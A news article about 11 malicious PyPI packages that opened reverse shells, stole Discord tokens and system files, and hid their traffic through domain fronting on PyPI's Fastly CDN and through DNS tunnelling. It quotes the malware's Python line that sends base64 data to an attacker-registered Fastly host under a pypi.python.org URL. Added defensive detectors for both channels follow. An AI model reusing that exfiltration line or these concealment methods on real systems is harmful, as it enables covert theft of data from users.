Malicious libraries found in the PyPI catalog that use the PyPI CDN to hide their communication channel.

In the PyPI (Python Package Index) directory, 11 packages containing malicious code have been identified. Before the problem was discovered, the packages had been downloaded about 38 thousand times in total. The detected malicious packages are notable for their use of sophisticated methods to hide the communication channels with the attackers' servers.

  • importantpackage (6305 downloads), important-package (12897) - established a connection to an external server under the guise of connecting to pypi.python.org in order to provide shell access to the system (reverse shell), and used the trevorc2 program to hide the communication channel.
  • pptest (10001), ipboards (946) - used DNS as the communication channel to transmit information about the system (in the first package: the hostname, working directory, internal and external IP; in the second: the username and hostname).
  • owlmoon (3285), DiscordSafety (557), yiffparty (1859) - located the Discord service token on the system and sent it to an external host.
  • trrfab (287) - sent an identifier, the hostname and the contents of /etc/passwd, /etc/hosts and /home to an external host.
  • 10Cent10 (490) - established a reverse shell connection to an external host.
  • yandex-yt (4183) - displayed a message that the system had been compromised and redirected to a page with additional information about further actions, issued via nda.ya.ru (api.ya.cc).

Of particular note is the method of reaching external hosts used in the importantpackage and important-package packages, which took advantage of the Fastly content delivery network serving the PyPI index to hide their activity. The requests were in fact sent to the pypi.python.org server (including specifying the python.org name in the SNI of the HTTPS request), but the HTTP "Host" header carried the name of an attacker-controlled server (psec.forward.io.global.prod.fastly.net). The content delivery network forwarded such a request to the attackers' server, reusing the parameters of the TLS connection to pypi.python.org when transmitting the data.

The PyPI infrastructure is served by the Fastly content delivery network, which uses the Varnish transparent proxy to cache typical requests and terminates TLS at the CDN level rather than on the origin servers in order to proxy HTTPS requests. Regardless of the target host, requests are sent to the proxy, which determines the requested host from the HTTP "Host" header, and the hostnames resolve to the IP addresses of the CDN load balancers, which are shared by all Fastly customers.

The attackers' server was also registered with the Fastly CDN, which offers free plans to everyone and even allows anonymous registration. Notably, the same scheme is used when sending requests to the victim to set up the "reverse shell", but in that case it is initiated from the attacker's host. From the outside, the interaction with the attackers' server looks like a legitimate session with the PyPI directory, encrypted with the PyPI TLS certificate. A similar technique, known as "domain fronting", was previously used to hide the hostname when bypassing blocking, taking advantage of the ability offered by some CDNs to access HTTPS by specifying a dummy host in the SNI while passing the name of the actually requested host in the HTTP Host header inside the TLS session.
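The mismatch the article describes (python.org in the SNI, an attacker-controlled service name in the Host header) is visible to any TLS-inspecting proxy or flow log that records both fields. The following detector is an added example, not code from the opennet.ru article or from the research it summarises; the JSON log format, the source addresses and the "crude eTLD+1" rule are constructed for illustration, and a production version should use the Public Suffix List instead of the last-two-labels shortcut.

```python
"""Flag HTTPS requests whose HTTP Host header disagrees with the TLS SNI.

Added example. It assumes a TLS-inspecting proxy or flow log that records,
per request, the SNI name from the ClientHello and the HTTP Host header
seen inside the tunnel; the JSON-lines format below is constructed.
"""
import json

# Constructed sample log. Record 2 mirrors the pattern described in the
# article: SNI says python.org, Host names a Fastly service name that the
# attackers registered.
SAMPLE_LOG = """
{"src": "10.0.0.12", "sni": "pypi.python.org", "host": "pypi.python.org", "path": "/simple/requests/"}
{"src": "10.0.0.12", "sni": "python.org", "host": "psec.forward.io.global.prod.fastly.net", "path": "/images?guid=aGVsbG8="}
{"src": "10.0.0.7", "sni": "files.pythonhosted.org", "host": "files.pythonhosted.org:443", "path": "/packages/x.whl"}
{"src": "10.0.0.7", "sni": "python.org", "host": "docs.python.org", "path": "/3/"}
"""


def registrable(name: str) -> str:
    """Crude eTLD+1: the last two DNS labels, after dropping an optional
    port and trailing dot. Adequate for .org/.net style names; a real
    deployment should consult the Public Suffix List."""
    name = name.lower().split(":")[0].rstrip(".")
    labels = name.split(".")
    return ".".join(labels[-2:])


def is_fronted(sni: str, host: str) -> bool:
    """True when the Host header and the SNI do not share a registrable
    domain, i.e. the request inside the TLS session is not for the site
    the handshake claimed."""
    return registrable(sni) != registrable(host)


def detect_fronting(log_text: str) -> list[dict]:
    """Return the log records whose Host header points somewhere the SNI
    does not. Malformed lines are skipped rather than aborting the scan."""
    hits = []
    for line in log_text.strip().splitlines():
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        if is_fronted(rec["sni"], rec["host"]):
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for rec in detect_fronting(SAMPLE_LOG):
        print(f"possible domain fronting from {rec['src']}: "
              f"SNI={rec['sni']} Host={rec['host']} path={rec['path']}")
```

Only the second record is reported: docs.python.org under an SNI of python.org shares the registrable domain and passes, as does the same host with an explicit port. Because the CDN itself accepts this traffic as legitimate, the comparison has to happen on the client side of the CDN (an egress proxy or endpoint telemetry), where both the SNI and the decrypted Host header are observable.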


To hide the malicious activity, the TrevorC2 package was additionally used to make the interaction with the server resemble ordinary web browsing; for example, the malicious requests were sent under the guise of downloading the image "https://pypi.python.org/images?guid=", with the information encoded in the guid parameter:

from urllib import request

# b64_payload is the base64-encoded data smuggled in the "guid" parameter
url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})

The pptest and ipboards packages used a different method of hiding their network activity, based on embedding the useful information in queries to the DNS server. The malware transmits information by making DNS queries such as "nu4timjagq4fimbuhe.example.com", in which the data sent to the control server is encoded in base64 in the subdomain name. The attacker receives these messages by controlling the DNS server for the example.com domain.
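Encoded data in the leftmost label leaves a recognisable trace in resolver logs: the label is long, it changes on every query, and its characters are far more evenly distributed than in a human-chosen hostname. The following detector is an added example, not code from the article or from the packages it describes; the "client qname" log format, the thresholds, the allowlist and all queries other than the one quoted in the article are constructed for illustration and would need tuning per environment.

```python
"""Spot DNS queries whose leftmost label looks like encoded data.

Added example. It assumes a resolver query log in the constructed
"client qname" form below; thresholds and allowlist are illustrative.
"""
import math
from collections import Counter

# Constructed resolver log. The second line reuses the query shape quoted
# in the article; line 5 is a constructed longer label of the same kind.
SAMPLE_QUERIES = """
10.0.0.12 pypi.python.org
10.0.0.12 nu4timjagq4fimbuhe.example.com
10.0.0.7 files.pythonhosted.org
10.0.0.7 www.example.com
10.0.0.12 mfrggzdfmztwq2lknnwg23tpo5xxe3denbwi.example.com
"""

MIN_LABEL_LEN = 12          # labels shorter than this are not scored
MIN_ENTROPY = 3.0           # bits per character of the leftmost label
ALLOWED_APEX = {"pythonhosted.org"}  # zones known to use hashed labels


def shannon_entropy(s: str) -> float:
    """Bits per character; 0.0 for a single repeated character."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_encoded(qname: str) -> bool:
    """Heuristic: a long, high-entropy leftmost label under an apex that is
    not known to legitimately use such labels."""
    labels = qname.lower().rstrip(".").split(".")
    if len(labels) < 3:                       # apex or TLD lookup
        return False
    if ".".join(labels[-2:]) in ALLOWED_APEX:
        return False
    first = labels[0]
    return len(first) >= MIN_LABEL_LEN and shannon_entropy(first) >= MIN_ENTROPY


def detect_dns_exfil(log_text: str) -> list[tuple[str, str]]:
    """Return (client, qname) pairs whose query name looks like encoded data."""
    hits = []
    for line in log_text.strip().splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue
        client, qname = parts
        if looks_encoded(qname):
            hits.append((client, qname))
    return hits


if __name__ == "__main__":
    for client, qname in detect_dns_exfil(SAMPLE_QUERIES):
        print(f"possible DNS exfiltration from {client}: {qname}")
```

In a real deployment the per-label score is only the first filter; the stronger signal is volume, namely many distinct high-entropy labels from one client under one apex in a short window, since an encoded channel must vary the label on every message. The article's own example label happens to be lowercase and free of base64 padding, which is why the detector scores character distribution rather than trying to decode the label.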

Source: opennet.ru
